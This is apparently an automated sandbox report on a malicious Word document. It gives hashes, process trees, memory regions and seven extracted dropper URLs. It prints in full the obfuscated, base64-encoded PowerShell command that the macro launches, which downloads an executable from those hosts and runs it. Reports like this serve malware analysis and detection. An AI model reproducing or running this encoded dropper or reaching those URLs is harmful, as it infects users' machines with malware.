Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10-05-2024 16:11

General

  • Target

    2ff53c10a0d9f280aaa172284df6bed0_JaffaCakes118.doc

  • Size

    195KB

  • MD5

    2ff53c10a0d9f280aaa172284df6bed0

  • SHA1

    3cd3a1a3c266acd3e139ad0e9afc623061b0c0dd

  • SHA256

    33bab5da95407fde0ab439aa5942622a7e1286cb5ad74d4e55689fa5c59f8559

  • SHA512

    17b0283e2bafb97dbaa5934cfc2620d56eb8f0c6acb0f24b709c904295d8783e84db55273281322a55889f79b14cd0a579d095f8037f29eeced2766609011dfd

  • SSDEEP

    1536:2rdi1Ir77zOH98Wj2gpngh+a9vEul8oPhEPmRl6VOo4p:2rfrzOH98ipgzEul8uWP+l6VOo4p

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://vstbar.com/wp-admin/Hs/

exe.dropper

http://binarywebtechsolutions.com/mobile-website-designing-company-in-gurgaon/CLZ/

exe.dropper

http://shahqutubuddin.org/U/

exe.dropper

http://cybersign-001-site5.gtempurl.com/2xwzq/bve/

exe.dropper

https://star-speed.vip/wp-admin/Ttv/

exe.dropper

https://treneg.com.br/rfvmbh/a/

exe.dropper

https://cimsjr.com/hospital/x2f/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2ff53c10a0d9f280aaa172284df6bed0_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3AGIAaQA0AE8AQwBcAFEAawByAEgAMgBaAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQBSAEkAdABgAHkAUAByAGAATwBUAGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACgAJwAxADIALAAgACcAKwAnAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQAQQA4AGcAdQBtAHkAOQAgAD0AIAAoACgAJwBGAGgAZABuACcAKwAnAHMAJwApACsAJwB1ACcAKQA7ACQAQgAwADkAbABkAHYAZAA9ACgAKAAnAEkAdwAnACsAJwB3ADMAJwApACsAJwB2ACcAKwAnADYAeQAnACkAOwAkAE0AYgBiADkAbwBjAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVwBTACcAKwAoACcAeABNACcAKwAnADcAJwApACsAKAAnAGIAaQA0ACcAKwAnAG8AJwApACsAKAAnAGMAJwArACcAVwBTACcAKQArACgAJwB4ACcAKwAnAFEAawByAGgAMgAnACsAJwB6ACcAKQArACgAJwBrAFcAJwArACcAUwB4ACcAKQApACAALQByAEUAUABsAGEAYwBFACAAIAAoACcAVwBTACcAKwAnAHgAJwApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEEAOABnAHUAbQB5ADkAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFYAMwBnAGgAbQA2ADcAPQAoACcAUAAnACsAKAAnADAAJwArACcAbgAwACcAKQArACgAJwB0ACcAKwAnAHYAOAAnACkAKQA7ACQAQwB1AGQAagBsAGwAdwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQAWQBrADkAdgBkAGcAdQA9ACgAKAAnAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AdgBzAHQAJwArACcAYgBhAHIAJwApACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwArACcAaQBuAC8AJwApACsAKAAnAEgAJwArACcAcwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwADoAJwArACgAJwAvACcAKwAnAC8AYgBpACcAKQArACgAJwBuACcAKwAnAGEAcgB5AHcAZQBiAHQAJwArACcAZQAnACkAKwAoACcAYwBoAHMAbwAnACsAJwBsAHUAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAG0AbwBiAGkAbABlACcAKwAnAC0AdwBlACcAKwAnAGIAJwArACcAcwAnACkAKwAoACcAaQB0ACcAKwAnAGUAJwApACsAKAAnAC0AJwArACcAZABlAHMAaQBnACcAKQArACgAJwBuAGkAbgBnACcAKwAnAC0AYwAnACsAJwBvACcAKQArACcAbQBwACcAKwAoACcAYQBuACcAKwAnAHkAJwArACcALQBpAG4ALQAnACkAKwAoACcAZwB1ACcAKwAnAHIAZwAnACkAKwAoACcAYQBvACcAKwAnAG4ALwBDAEwAJwApACsAKAAnAFoAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAaABhACcAKwAnAGgAcQAnACkAKwAnAHUAdAAnACsAJwB1AGIAJwArACcAdQAnACsAJwBkACcAKwAnAGQAaQAnACsAJwBuAC4AJwArACcAbwAnACsAJwByACcAKwAnAGcALwAnACsAJwBVACcAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGMAeQBiAGUAcgBzACcAKwAnAGkAZwAnACkAKwAoACcAbgAtACcAKwAnADAAMAAxAC0AcwBpACcAKwAnAHQAZQAnACsAJwA1AC4AZwB0ACcAKwAnAGUAJwApACsAJwBtACcAKwAnAHAAJwArACgAJwB1ACcAKwAnAHIAbAAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACgAJwAyAHgAJwArACcAdwB6AHEAJwApACsAKAAnAC8AYgB2AGUAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAnAC8AcwAnACsAKAAnAHQAYQAnACsAJwByAC0AJwArACcAcwBwAGUAZQAnACkAKwAnAGQAJwArACcALgB2ACcAKwAnAGkAJwArACgAJwBwAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACkAKwAnAC8AJwArACcAVAAnACsAKAAnAHQAJwArACcAdgAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwAnACsAJwB0AHIAJwApACsAJwBlACcAKwAoACcAbgBlACcAKwAnAGcAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALgBiACcAKwAnAHIALwAnACsAJwByAGYAJwApACsAKAAnAHYAbQAnACsAJwBiAGgAJwArACcALwBhAC8AKgBoAHQAJwApACsAJwB0AHAAJwArACcAcwAnACsAJwA6AC8AJwArACgAJwAvAGMAaQBtACcAKwAnAHMAJwApACsAKAAnAGoAcgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGgAJwApACsAJwBvAHMAJwArACcAcAAnACsAJwBpAHQAJwArACgAJwBhAGwALwB4ACcAKwAnADIAJwArACcAZgAvACcAKQApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAawAxAG0AbQBuAF8APQAoACcAWQAnACsAJwAxACcAKwAoACcAaAB2AHAAJwArACcAagAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABmAHkAdgBqAHQAMwAgAGkAbgAgACQAWQBrADkAdgBkAGcAdQApAHsAdAByAHkAewAkAEMAdQBkAGoAbABsAHcALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABGAEkATABFACIAKAAkAFQAZgB5AHYAagB0ADMALAAgACQATQBiAGIAOQBvAGMAawApADsAJABPAGEAawB3AG0AbQBmAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnAHoAZgAnACkAKwAoACcAaABlACcAKwAnAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQATQBiAGIAOQBvAGMAawApAC4AIgBsAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAyADMAMwApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABNAGIAYgA5AG8AYwBrACkAOwAkAE4AdABrAGYAbQA3AHEAPQAoACcAVwAnACsAJwBrAHgAJwArACgAJwB4AGsAJwArACcAMQBuACcAKQApADsAYgByAGUAYQBrADsAJABEAHAAdABsAGwAMgA3AD0AKAAoACcATQBqACcAKwAnAHQAJwApACsAKAAnAHkAJwArACcANQBjADUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOAA3ADEAcQBkAGkAPQAoACcAVgAnACsAJwA0ACcAKwAoACcAcQBjAHQAJwArACcAdgAzACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      589161417981548766cd9831577aec91

      SHA1

      4a0e1bb1cf6907c03630382d53716bcc00c7f225

      SHA256

      cfe71c25160e06c5f0d2ed3b251d982f92baf0891925e2c35c5728bca8a04434

      SHA512

      68b1a9529ce3734d70e852f19789a8db268506bf8d66ec9a7aa345bcadea31780229ef6787e6ba26bc0dd43bda82e8c7ee8978bf604b60931e410fe3edd54d73

    • memory/2692-40-0x000000001B260000-0x000000001B542000-memory.dmp

      Filesize

      2.9MB

    • memory/2692-41-0x0000000001D00000-0x0000000001D08000-memory.dmp

      Filesize

      32KB

    • memory/2812-13-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-49-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-8-0x0000000005F20000-0x0000000006020000-memory.dmp

      Filesize

      1024KB

    • memory/2812-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-19-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-22-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-23-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-21-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-20-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-18-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-17-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-27-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-11-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-16-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-14-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-0-0x000000002FAC1000-0x000000002FAC2000-memory.dmp

      Filesize

      4KB

    • memory/2812-68-0x0000000070E5D000-0x0000000070E68000-memory.dmp

      Filesize

      44KB

    • memory/2812-7-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-15-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-33-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-31-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-30-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-29-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-26-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-24-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-32-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-34-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-6-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-2-0x0000000070E5D000-0x0000000070E68000-memory.dmp

      Filesize

      44KB

    • memory/2812-46-0x0000000070E5D000-0x0000000070E68000-memory.dmp

      Filesize

      44KB

    • memory/2812-47-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-28-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-50-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2812-67-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2812-25-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2812-69-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB